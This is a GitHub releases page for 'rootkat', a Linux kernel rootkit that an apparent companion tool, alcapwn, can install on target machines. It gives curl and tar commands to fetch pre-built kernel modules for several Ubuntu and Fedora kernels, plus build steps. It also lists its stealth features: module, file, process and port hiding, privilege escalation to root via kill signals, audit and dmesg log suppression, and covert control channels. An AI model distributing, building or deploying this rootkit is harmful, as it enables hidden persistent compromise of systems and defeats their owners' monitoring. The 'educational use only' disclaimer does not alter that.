Releases: exec/rootkat
v1.0.0
Pre-built kernel modules
Drop the matching .tar.gz into your alcapwn cache:
KVER=$(uname -r)
ARCH=$(uname -m)
mkdir -p ~/.alcapwn/rootkat/$KVER
curl -fsSL "https://github.com/exec/rootkat/releases/latest/download/rootkat-ko-${KVER}-${ARCH}.tar.gz" \
| tar -xz -C ~/.alcapwn/rootkat/$KVER rootkat.koOr let alcapwn fetch it automatically: persist <id> rootkat downloads
and caches the right .ko for the target kernel if one is available.
| Asset | Kernel series | Distro |
|---|---|---|
rootkat-ko-6.8.*-generic-x86_64.tar.gz |
6.8.x | Ubuntu 24.04 LTS |
rootkat-ko-6.14.*.fc42.x86_64-x86_64.tar.gz |
6.14.x | Fedora 42 |
rootkat-ko-6.17.*-generic-x86_64.tar.gz |
6.17.x | Ubuntu 25.10 |
rootkat-ko-7.0.*-generic-x86_64.tar.gz |
7.0.x | Ubuntu 26.04 LTS |
ARM64 builds (drop-in replacement, same cache path logic):
| rootkat-ko-6.8.*-generic-aarch64.tar.gz | 6.8.x | Ubuntu 24.04 LTS / arm64 |
| rootkat-ko-6.17.*-generic-aarch64.tar.gz | 6.17.x | Ubuntu 25.10 / arm64 |
| rootkat-ko-7.0.*-generic-aarch64.tar.gz | 7.0.x | Ubuntu 26.04 LTS / arm64 |
For other kernel versions, see the build instructions.
v0.13 — dmesg self-hide + three-channel control surface
v0.13
14 stealth techniques verified end-to-end on Ubuntu 26.04 / kernel 7.0 and Ubuntu 24.04 LTS / kernel 6.x.
What's new in v0.13
- dmesg / printk self-hide — ftrace hook on `vprintk_emit` drops any log line containing "rootkat" before it reaches the ring buffer. Every consumer (dmesg, /dev/kmsg, journald, netconsole) sees the stripped log.
- Three-channel control surface — kill(2) magic signals, io_uring `IORING_OP_NOP` covert channel, and inbound UDP magic frame all reach the same `magic_actions.c` registry.
- `-fno-optimize-sibling-calls` — compiler-enforced defense against gcc sibling-call optimization defeating the ftrace recursion guard. Fixed soft-lockups on Debian 6.12 and Fedora 6.14 found in cross-distro survey.
- Cross-distro survey infrastructure — `tests/cross-distro-survey/` with PVE qm + cloud-init orchestrator. Verified clean on Ubuntu 24.04 (6.8), Debian 13 (6.12), Fedora 42 (6.14).
Pre-built kernel modules
Pre-built `.ko` files are attached for common kernel versions. Each tarball contains a single `rootkat.ko` built against that exact kernel's headers.
To use with alcapwn:
```
mkdir -p ~/.alcapwn/rootkat/6.8.0-111-generic
tar -xzf rootkat-ko-6.8.0-111-generic-x86_64.tar.gz -C ~/.alcapwn/rootkat/6.8.0-111-generic/
```
All techniques (v0.13)
| Feature | Mechanism | CI |
|---|---|---|
| Self-hide from /proc/modules | ftrace → m_show | ✓ both |
| Self-hide from /sys/module/ | ftrace → filldir64 | ✓ both |
| File hide | CO-RE eBPF lsm/file_open | ✓ both |
| Privesc to root | ftrace → __x64_sys_kill | ✓ both |
| Process hide | ftrace → filldir64 | ✓ both |
| TCP port hide (v4+v6, /proc+ss) | tcp4/6_seq_show · inet_sk_diag_fill | ✓ both |
| UDP port hide (v4+v6) | udp4/6_seq_show | ✓ both |
| AF_UNIX socket hide | unix_seq_show · unix_diag sk_diag_fill | ✓ both |
| BPF program self-hide | ftrace → __x64_sys_bpf | ✓ both |
| Audit log suppression | ftrace → audit_log_start | code-only |
| io_uring covert channel | ftrace → io_issue_sqe | ✓ both |
| Netfilter covert channel | nf_register_net_hook (NF_INET_PRE_ROUTING) | ✓ both |
| dmesg / printk self-hide | ftrace → vprintk_emit | ✓ both |
| Rust canary (cross-module) | EXPORT_SYMBOL_GPL stub + weak-link | ✓ 7.0 only |
Building for other kernels
```bash
Ubuntu 26.04 / kernel 7.0
./scripts/build.sh
Ubuntu 24.04 LTS / kernel 6.x
UBUNTU_VERSION=24.04 ./scripts/build.sh
```
See docs/threat-model.md for detection notes on every technique.
Educational use only. Loading rootkat on a system you do not own is illegal in most jurisdictions.